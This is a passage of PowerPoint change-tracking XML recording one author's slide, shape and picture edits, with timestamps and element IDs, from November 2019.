        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:26:45.891" v="2651" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1080216313" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T10:55:25.662" v="602" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1080216313" sldId="280"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:26:45.891" v="2651" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1080216313" sldId="280"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:26:54.403" v="2658" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3818845613" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T10:58:19.424" v="727" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3818845613" sldId="281"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:26:54.403" v="2658" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3818845613" sldId="281"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:15:21.615" v="1325" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3913747908" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T11:20:25.328" v="799" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3913747908" sldId="282"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:15:21.615" v="1325" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3913747908" sldId="282"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add ord">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:27:52.999" v="2662" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4135283673" sldId="283"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T11:20:34.546" v="804" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4135283673" sldId="283"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:27:52.999" v="2662" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4135283673" sldId="283"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:04:02.339" v="2137" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="732151178" sldId="284"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T11:24:56.299" v="851" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="732151178" sldId="284"/>
            <ac:spMk id="2" creationId="{9F1A00EF-F84C-E440-A6A1-916015A64F27}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:04:02.339" v="2137" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="732151178" sldId="284"/>
            <ac:spMk id="3" creationId="{B22949A1-B23B-AE4D-AD0B-DA4357F4C514}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T11:39:32.406" v="1028" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1955399424" sldId="285"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T11:34:47.091" v="924" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1955399424" sldId="285"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T11:39:32.406" v="1028" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1955399424" sldId="285"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T11:34:52.008" v="929"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="228581649" sldId="286"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:15:59.498" v="1333" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1564624249" sldId="286"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:09:05.532" v="1246" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1564624249" sldId="286"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:15:59.498" v="1333" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1564624249" sldId="286"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:38:15.225" v="1469" actId="732"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1291338447" sldId="287"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:36:53.143" v="1385" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1291338447" sldId="287"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:36:36.629" v="1377" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1291338447" sldId="287"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:36:06.193" v="1368"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1291338447" sldId="287"/>
            <ac:picMk id="4" creationId="{18F0DF8A-5752-194C-A09F-B0D74D6577E0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:38:15.225" v="1469" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1291338447" sldId="287"/>
            <ac:picMk id="5" creationId="{0B580A87-EF0A-4242-923F-0405068B8A20}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add ord">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:59:26.146" v="2666" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3244364504" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:25:49.412" v="1494" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3244364504" sldId="288"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:59:26.146" v="2666" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3244364504" sldId="288"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:57:43.237" v="2724" actId="1440"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1914022182" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:04:23.369" v="2149" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1914022182" sldId="289"/>
            <ac:spMk id="2" creationId="{9F1A00EF-F84C-E440-A6A1-916015A64F27}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:00:46.889" v="2688" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1914022182" sldId="289"/>
            <ac:spMk id="3" creationId="{B22949A1-B23B-AE4D-AD0B-DA4357F4C514}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:45:09.281" v="1838" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1914022182" sldId="289"/>
            <ac:spMk id="4" creationId="{F55064F8-B0B2-184E-94A0-2A709EDA38AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:57:40.006" v="2723" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1914022182" sldId="289"/>
            <ac:picMk id="5" creationId="{992C7ECF-772A-0C49-9644-8779C1DFA9C7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:57:43.237" v="2724" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1914022182" sldId="289"/>
            <ac:picMk id="6" creationId="{CF679DF0-55E2-7745-ACDE-EDF88BB3A629}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:29:22.565" v="1545"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2566305015" sldId="289"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:00:52.070" v="2107" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3768351577" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:49:05.408" v="1977" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3768351577" sldId="290"/>
            <ac:spMk id="2" creationId="{DA9FC803-71D2-E244-B7AA-1EDA33C9314C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:00:52.070" v="2107" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3768351577" sldId="290"/>
            <ac:spMk id="3" creationId="{90623EC1-93C0-4F4C-B0C3-AD056D590A95}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:01:52.342" v="2111" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3878620498" sldId="291"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:49:40.845" v="1984" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3878620498" sldId="291"/>
            <ac:spMk id="2" creationId="{DA9FC803-71D2-E244-B7AA-1EDA33C9314C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:57:03.522" v="2085" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3878620498" sldId="291"/>
            <ac:spMk id="3" creationId="{90623EC1-93C0-4F4C-B0C3-AD056D590A95}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:01:52.342" v="2111" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3878620498" sldId="291"/>
            <ac:picMk id="5" creationId="{E6BF19E8-F3BF-9B4F-B959-08BCDBB34C5D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:07:44.341" v="2150"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3353592092" sldId="292"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:24:47.106" v="2579" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3151958808" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:24:19.782" v="2563" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3151958808" sldId="293"/>
            <ac:spMk id="2" creationId="{DA9FC803-71D2-E244-B7AA-1EDA33C9314C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:24:47.106" v="2579" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3151958808" sldId="293"/>
            <ac:spMk id="3" creationId="{90623EC1-93C0-4F4C-B0C3-AD056D590A95}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:25:44.074" v="2645" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3952698183" sldId="294"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:24:24.871" v="2571" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952698183" sldId="294"/>
            <ac:spMk id="2" creationId="{DA9FC803-71D2-E244-B7AA-1EDA33C9314C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:25:44.074" v="2645" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952698183" sldId="294"/>
            <ac:spMk id="3" creationId="{90623EC1-93C0-4F4C-B0C3-AD056D590A95}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T11:01:14.519" v="2909" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1686140852" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:58:46.166" v="2733" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1686140852" sldId="295"/>
            <ac:spMk id="2" creationId="{1D2756DC-D91B-FC43-A0B9-A08C7ECE7D70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T11:01:14.519" v="2909" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1686140852" sldId="295"/>
            <ac:spMk id="3" creationId="{E405242E-9089-314E-ABF5-36B280FB8CCB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}"/>
    <pc:docChg chg="custSel addSld delSld modSld sldOrd modShowInfo">
      <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:37:07.928" v="379" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T08:26:23.189" v="16" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="37764395" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T08:26:23.189" v="16" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="37764395" sldId="256"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:16:17.966" v="276" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1504969557" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:16:17.966" v="276" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504969557" sldId="257"/>
            <ac:spMk id="3" creationId="{E405242E-9089-314E-ABF5-36B280FB8CCB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:14.944" v="282" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2803657723" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:14.944" v="282" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2803657723" sldId="260"/>
            <ac:spMk id="3" creationId="{380D5B38-B54F-654B-9DE1-0BBA64B73171}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
